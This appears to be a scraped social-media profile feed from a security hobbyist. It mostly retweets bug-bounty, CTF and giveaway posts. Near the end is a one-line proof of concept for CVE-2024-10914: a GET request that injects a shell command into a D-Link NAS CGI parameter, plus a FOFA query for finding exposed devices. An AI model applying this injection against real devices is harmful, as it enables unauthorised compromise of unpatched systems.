heapbytes's profile picture. What you're not changing, you're choosing.

kiyoooooo

@heapbytes

What you're not changing, you're choosing.

life was better before AI :)


Chemistry on Hack The Box is now retired! Writeup - blog.heapbytes.tech/rooms/hacktheb…

heapbytes's tweet image. Chemistry on Hack The Box is now retired!

Writeup - blog.heapbytes.tech/rooms/hacktheb…

Hey guys, If anyone’s going @nullcon Goa and is looking for a group for stay, let me know. I need a friend/group for the same.


kiyoooooo أعاد

You're missing out if you're in Web3 security and haven't seen this repo yet. It lists ~ 200 smart contract hacks in the DeFi space and reproduces them using Foundry. Learn from past mistakes, anon! 🫡🔥 See below 👇 github.com/SunWeb3Sec/DeF…


kiyoooooo أعاد

Cert Exam Voucher Giveaway provided by @ablativetech Prizes: 1 Security+ exam voucher 1 CCNA exam voucher How to enter: - RT - comment which voucher you want Winner will be picked next week. Good luck!

phishfinding's tweet image. Cert Exam Voucher Giveaway provided by @ablativetech 

Prizes:
1 Security+ exam voucher
1 CCNA exam voucher

How to enter:
- RT
- comment which voucher you want

Winner will be picked next week. Good luck!

kiyoooooo أعاد

🥷𝗖𝗵𝗮𝗹𝗹𝗲𝗻𝗴𝗲 𝘁𝗶𝗺𝗲, 𝗺𝘆 𝗱𝗲𝗮𝗿 𝗮𝘂𝗱𝗶𝘁𝗼𝗿 𝗳𝗿𝗶𝗲𝗻𝗱𝘀: 🐛This is a vulnerable code snippet of Deus Finance (Lending Contract) which led to loss of $3.1 million Can you spot it ?

0xaudron's tweet image. 🥷𝗖𝗵𝗮𝗹𝗹𝗲𝗻𝗴𝗲 𝘁𝗶𝗺𝗲, 𝗺𝘆 𝗱𝗲𝗮𝗿 𝗮𝘂𝗱𝗶𝘁𝗼𝗿 𝗳𝗿𝗶𝗲𝗻𝗱𝘀:
🐛This is a vulnerable code snippet of Deus Finance (Lending Contract) which led to loss of $3.1 million 

Can you spot it ?

kiyoooooo أعاد

We’re launching the HackTricks Assistant Chatbot hacktricks.ai for everybody! - It has access to the comprehensive HackTricks & HackTricks Cloud knowledge base - You can get answers on technical cybersecurity topics and generate practice facts and questions for…


kiyoooooo أعاد

"I Stole My Own Reddit Account" -- a session hijacking demo! With background context on cookies, initial access via LNK cradle, running custom infostealer payloads in PowerShell, and a full account takeover that we explore with an anti-detect browser! 😈 jh.live/hdE4l6O_xXM

_JohnHammond's tweet image. "I Stole My Own Reddit Account" -- a session hijacking demo! With background context on cookies, initial access via LNK cradle, running custom infostealer payloads in PowerShell, and a full account takeover that we explore with an anti-detect browser! 😈 jh.live/hdE4l6O_xXM

kiyoooooo أعاد

DevOps & Cloud (Role Based Certification) 👇 ++++++ Docker Course for Free👇

techyoutbe's tweet image. DevOps & Cloud (Role Based Certification) 👇

++++++

Docker Course for Free👇

kiyoooooo أعاد

BEN SAID I COULD DO A GIVEAWAY TOO 🥳 HackingHub Black Friday deal: hhub.io/tQWXgd $39 for lifetime access ♾️ OR $19 for a month trial ⏰ AND I can match his giveaway-- 2️⃣ WINNERS (1 each) - Full cert bundle - Lifetime access To enter: ↪️ retweet and reply w/ 🦃

_JohnHammond's tweet image. BEN SAID I COULD DO A GIVEAWAY TOO 🥳

HackingHub Black Friday deal: hhub.io/tQWXgd

$39 for lifetime access ♾️
OR
$19 for a month trial ⏰

AND I can match his giveaway-- 
2️⃣ WINNERS (1 each)
 - Full cert bundle
 - Lifetime access

To enter: ↪️ retweet and reply w/ 🦃

kiyoooooo أعاد

If you like bounties, I highly recommend this presentation from @tincho_508 on novel web cache deception techniques. It comes with @WebSecAcademy labs too! youtube.com/watch?v=70yyOM…

albinowax's tweet card. DEF CON 32 - Gotta Cache ‘em all bending the rules of web cache...

youtube.com

YouTube

DEF CON 32 - Gotta Cache ‘em all bending the rules of web cache...


kiyoooooo أعاد

you can try this Cloudflare rocketloader nuclei template for SSRF and Finding Origin ip behind WAF helpful in WAF Bypass.. github.com/coffinxp/nucle…

coffinxp7's tweet image. you can try this Cloudflare rocketloader nuclei template for SSRF and Finding Origin ip behind WAF helpful in WAF Bypass..
github.com/coffinxp/nucle…

kiyoooooo أعاد

38: 0-100k in bug bounty with a 9-5 job Continued reading more IDOR reports. Unfortunately due to loads of office work, am not able to give a lot of time to Bugbounty. This is getting even tougher than I estimated, but anyways I wont stop. For IDOR Resources👇 @Rhynorater

techycodec08's tweet image. 38: 0-100k in bug bounty with a 9-5 job

Continued reading more IDOR reports.

Unfortunately due to loads of office work, am not able to give a lot of time to Bugbounty.

This is getting even tougher than I estimated, but anyways I wont stop.

For IDOR Resources👇

@Rhynorater

kiyoooooo أعاد

IDOR leads to the deletion of main group (or all groups) using "/v1/groups" endpoint (€500) 1) In the redacted app, admins can edit and delete the groups section. But, users don't have permission to delete the main group. So, users cannot edit or delete the other groups. 👇


Hey @CoinDCX_Cares @CoinDCX I’ve reached out to you through dm, kindly check my concern. And update your app support, or Atleast change name from support->Faq(frequently answered questions) to stop misleading 🙂


kiyoooooo أعاد

cve-2024-10914 GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27 FOFA:app =D_Link-DNS-ShareCenter #exploit #poc #IoT

akaclandestine's tweet image. cve-2024-10914

GET  

/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&amp;amp;name=%27;&amp;lt;INJECTED_SHELL_COMMAND&amp;gt;;%27

FOFA:app =D_Link-DNS-ShareCenter

#exploit #poc #IoT

Loading...

Something went wrong.


Something went wrong.